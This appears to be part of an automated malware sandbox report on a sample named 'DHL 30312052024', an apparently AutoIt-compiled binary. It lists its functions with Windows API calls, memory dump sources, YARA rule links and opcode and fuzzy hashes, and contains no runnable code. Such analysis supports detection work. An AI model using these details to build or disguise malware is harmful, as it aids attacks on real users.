                                                                                        Function 00C587B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00C58389), ref: 00C587D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LogonUser
                                                                                        • String ID:
                                                                                        • API String ID: 1244722697-0
                                                                                        • Opcode ID: 27fc9f74db034fdf046c153293f12d6b84abffdd67abb52dea979338b8883a72
                                                                                        • Instruction ID: c7e803d0bc993411d96c6572ed8a3379a7c327bce79b84580a6495cb2c7a3c74
                                                                                        • Opcode Fuzzy Hash: 27fc9f74db034fdf046c153293f12d6b84abffdd67abb52dea979338b8883a72
                                                                                        • Instruction Fuzzy Hash: 34D09E3226450EAFEF019EA4DD05EAE3B69EB04B01F408511FE15D51A1C775D935AB60
                                                                                        Function 00C2A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C2A12A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: a08c32fa052ffab0a46d7e3d5a2f45bbb72102077cfb976f8cccc8acd306aeeb
                                                                                        • Instruction ID: b7ea347d89df2fb2e8de11ea96f9074877cc93c3786db843448382c846cc1159
                                                                                        • Opcode Fuzzy Hash: a08c32fa052ffab0a46d7e3d5a2f45bbb72102077cfb976f8cccc8acd306aeeb
                                                                                        • Instruction Fuzzy Hash: E4A0113000020CAB8A002B82EC08A88BFACEA022A0B008020F80C800328B32A8228A88
                                                                                        Function 00C18808 Relevance: .6, Instructions: 590COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3b174469800f325b1acc0384dacee9db51cadf0e68da709dfb2daf8032ce619a
                                                                                        • Instruction ID: ba050ce96794ba9263b1046e8fe3a631518c03a7e94bd7b1bf53a48f0bc1b8e5
                                                                                        • Opcode Fuzzy Hash: 3b174469800f325b1acc0384dacee9db51cadf0e68da709dfb2daf8032ce619a
                                                                                        • Instruction Fuzzy Hash: 5722583490C506CBDF388A25C4A47BCB7A1FF42305F28816ADA668B592DB749ECDF741
                                                                                        Function 00C221C5 Relevance: .3, Instructions: 345COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                        • Instruction ID: 280b92b2ad6da3cb3de5c130414e845d635a925a204c8884bd733658fc906f3c
                                                                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                        • Instruction Fuzzy Hash: 53C198322051B349DF2E463AA43403EFAA15EA27B131F076DD8B3CB9D4EE20DA25D610
                                                                                        Function 00C225FA Relevance: .3, Instructions: 341COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                        • Instruction ID: b29688fecce5103424fd06d7acaa882e60fb5f79652b03264f22a6bf791b5760
                                                                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                        • Instruction Fuzzy Hash: E5C175332051B349DF2E463AD43413EBAA15FA27B171F076DD8B2DB9D4EE10CA25D620
                                                                                        Function 00C21978 Relevance: .3, Instructions: 323COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                        • Instruction ID: a6b0178af2f4ba52e0efeaf2c15cd5a30d79d6c32c477b68e6a008e86851cd6f
                                                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                        • Instruction Fuzzy Hash: A6C185362451B34ADF2E463A943413EBAA15EB27B131F076DDCB3CB9C4EE20CA65D610
                                                                                        Function 00C77806 Relevance: 79.2, APIs: 40, Strings: 5, Instructions: 491filecommemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 00C7785B
                                                                                        • DeleteObject.GDI32(00000000), ref: 00C7786D
                                                                                        • DestroyWindow.USER32 ref: 00C7787B
                                                                                        • GetDesktopWindow.USER32 ref: 00C77895
                                                                                        • GetWindowRect.USER32(00000000), ref: 00C7789C
                                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00C779DD
                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00C779ED
                                                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C77A35
                                                                                        • GetClientRect.USER32(00000000,?), ref: 00C77A41
                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C77A7B
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C77A9D
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C77AB0
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C77ABB
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00C77AC4
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C77AD3
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00C77ADC
                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C77AE3
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00C77AEE
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C77B00
                                                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00C92CAC,00000000), ref: 00C77B16
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00C77B26
                                                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00C77B4C
                                                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00C77B6B
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C77B8D
                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C77D7A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                        • String ID: $@U=u$AutoIt v3$DISPLAY$static
                                                                                        • API String ID: 2211948467-3613752883
                                                                                        • Opcode ID: d003be8a3cefa57a4654fe957a4636479ef84fcecda0bfced2a8e8e8c7fc2e8e
                                                                                        • Instruction ID: 38c857859eb677e34241c380c4a7534104296576e6e591f423adef90109ce436
                                                                                        • Opcode Fuzzy Hash: d003be8a3cefa57a4654fe957a4636479ef84fcecda0bfced2a8e8e8c7fc2e8e
                                                                                        • Instruction Fuzzy Hash: 40025B75900119EFDB14DFA4DC89FAE7BB9EF48310F148269F915AB2A1C730AD42CB64
                                                                                        Function 00C8A5DA Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 260COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00C8A630
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00C8A661
                                                                                        • GetSysColor.USER32(0000000F), ref: 00C8A66D
                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 00C8A687
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00C8A696
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00C8A6C1
                                                                                        • GetSysColor.USER32(00000010), ref: 00C8A6C9
                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00C8A6D0
                                                                                        • FrameRect.USER32(?,?,00000000), ref: 00C8A6DF
                                                                                        • DeleteObject.GDI32(00000000), ref: 00C8A6E6
                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00C8A731
                                                                                        • FillRect.USER32(?,?,00000000), ref: 00C8A763
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C8A78E
                                                                                          • Part of subcall function 00C8A8CA: GetSysColor.USER32(00000012), ref: 00C8A903
                                                                                          • Part of subcall function 00C8A8CA: SetTextColor.GDI32(?,?), ref: 00C8A907
                                                                                          • Part of subcall function 00C8A8CA: GetSysColorBrush.USER32(0000000F), ref: 00C8A91D
                                                                                          • Part of subcall function 00C8A8CA: GetSysColor.USER32(0000000F), ref: 00C8A928
                                                                                          • Part of subcall function 00C8A8CA: GetSysColor.USER32(00000011), ref: 00C8A945
                                                                                          • Part of subcall function 00C8A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C8A953
                                                                                          • Part of subcall function 00C8A8CA: SelectObject.GDI32(?,00000000), ref: 00C8A964
                                                                                          • Part of subcall function 00C8A8CA: SetBkColor.GDI32(?,00000000), ref: 00C8A96D
                                                                                          • Part of subcall function 00C8A8CA: SelectObject.GDI32(?,?), ref: 00C8A97A
                                                                                          • Part of subcall function 00C8A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00C8A999
                                                                                          • Part of subcall function 00C8A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C8A9B0
                                                                                          • Part of subcall function 00C8A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00C8A9C5
                                                                                          • Part of subcall function 00C8A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C8A9ED
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3521893082-2594219639
                                                                                        • Opcode ID: 33984706fe950c794068038e5f0887c715499e4a6bafbb25e48aa864a6586cff
                                                                                        • Instruction ID: 535a02d1ae6b3d9855fa59fef470c9c1ed0e4eb2e91fe1b5313edfdc79e17b55
                                                                                        • Opcode Fuzzy Hash: 33984706fe950c794068038e5f0887c715499e4a6bafbb25e48aa864a6586cff
                                                                                        • Instruction Fuzzy Hash: 53917B72408301AFD710AF64DC08B5F7BA9FB89325F100B2EF9A2961A0D770D946DB5A
                                                                                        Function 00C8356B Relevance: 52.9, APIs: 6, Strings: 24, Instructions: 365windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?,00C8F910), ref: 00C83627
                                                                                        • IsWindowVisible.USER32(?), ref: 00C8364B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpperVisibleWindow
                                                                                        • String ID: @U=u$ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                        • API String ID: 4105515805-3469695742
                                                                                        • Opcode ID: 6afa51c0325db033dcc6b09df95375847727d94006a553b1ada200fc510f712c
                                                                                        • Instruction ID: 25d28c8b7ed0bb8b6608f269510f189e98fd68f3fc970184393f558e020f077e
                                                                                        • Opcode Fuzzy Hash: 6afa51c0325db033dcc6b09df95375847727d94006a553b1ada200fc510f712c
                                                                                        • Instruction Fuzzy Hash: BCD19B70208240DBCB04FF10C491AAE77A5EF95758F144469F8926B3E3DB31EE4AEB49
                                                                                        Function 00C02C18 Relevance: 51.2, APIs: 27, Strings: 2, Instructions: 486windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?,?,?), ref: 00C02CA2
                                                                                        • DeleteObject.GDI32(00000000), ref: 00C02CE8
                                                                                        • DeleteObject.GDI32(00000000), ref: 00C02CF3
                                                                                        • DestroyIcon.USER32(00000000,?,?,?), ref: 00C02CFE
                                                                                        • DestroyWindow.USER32(00000000,?,?,?), ref: 00C02D09
                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00C3C43B
                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C3C474
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C3C89D
                                                                                          • Part of subcall function 00C01B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C02036,?,00000000,?,?,?,?,00C016CB,00000000,?), ref: 00C01B9A
                                                                                        • SendMessageW.USER32(?,00001053), ref: 00C3C8DA
                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C3C8F1
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C3C907
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C3C912
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                        • String ID: 0$@U=u
                                                                                        • API String ID: 464785882-975001249
                                                                                        • Opcode ID: 50990514e575f30ea269517495f80c205b8f266624c69528bd56686546b59616
                                                                                        • Instruction ID: 8e585f7831565bd2d856315c4593cb905ad480bab6f7a57f4b08a5923286d33c
                                                                                        • Opcode Fuzzy Hash: 50990514e575f30ea269517495f80c205b8f266624c69528bd56686546b59616
                                                                                        • Instruction Fuzzy Hash: 77127C30614201EFEB25CF24C8C8BADB7E5BF45304F544569F8A5EB2A2C731E952DB91
                                                                                        Function 00C774AB Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 284windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(00000000), ref: 00C774DE
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C7759D
                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00C775DB
                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00C775ED
                                                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00C77633
                                                                                        • GetClientRect.USER32(00000000,?), ref: 00C7763F
                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00C77683
                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C77692
                                                                                        • GetStockObject.GDI32(00000011), ref: 00C776A2
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00C776A6
                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00C776B6
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C776BF
                                                                                        • DeleteDC.GDI32(00000000), ref: 00C776C8
                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C776F4
                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C7770B
                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00C77746
                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C7775A
                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C7776B
                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00C7779B
                                                                                        • GetStockObject.GDI32(00000011), ref: 00C777A6
                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C777B1
                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00C777BB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                        • String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                        • API String ID: 2910397461-2771358697
                                                                                        • Opcode ID: 0760caac03446900443f3fd8cd2218b3f2c61aa6baa0711e4ccfb59e0f585c9c
                                                                                        • Instruction ID: 15cdd340ad2332df779b480fbbb2465e65ccdb0f0999b7880ffd7d889dc4bc26
                                                                                        • Opcode Fuzzy Hash: 0760caac03446900443f3fd8cd2218b3f2c61aa6baa0711e4ccfb59e0f585c9c
                                                                                        • Instruction Fuzzy Hash: 09A155B1A40619BFEB14DBA4DC49FAE7BB9EB04710F108218FA15E72E1D770AD41CB64
                                                                                        Function 00C8A8CA Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 187windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000012), ref: 00C8A903
                                                                                        • SetTextColor.GDI32(?,?), ref: 00C8A907
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00C8A91D
                                                                                        • GetSysColor.USER32(0000000F), ref: 00C8A928
                                                                                        • CreateSolidBrush.GDI32(?), ref: 00C8A92D
                                                                                        • GetSysColor.USER32(00000011), ref: 00C8A945
                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C8A953
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00C8A964
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00C8A96D
                                                                                        • SelectObject.GDI32(?,?), ref: 00C8A97A
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00C8A999
                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C8A9B0
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00C8A9C5
                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C8A9ED
                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C8AA14
                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00C8AA32
                                                                                        • DrawFocusRect.USER32(?,?), ref: 00C8AA3D
                                                                                        • GetSysColor.USER32(00000011), ref: 00C8AA4B
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00C8AA53
                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00C8AA67
                                                                                        • SelectObject.GDI32(?,00C8A5FA), ref: 00C8AA7E
                                                                                        • DeleteObject.GDI32(?), ref: 00C8AA89
                                                                                        • SelectObject.GDI32(?,?), ref: 00C8AA8F
                                                                                        • DeleteObject.GDI32(?), ref: 00C8AA94
                                                                                        • SetTextColor.GDI32(?,?), ref: 00C8AA9A
                                                                                        • SetBkColor.GDI32(?,?), ref: 00C8AAA4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
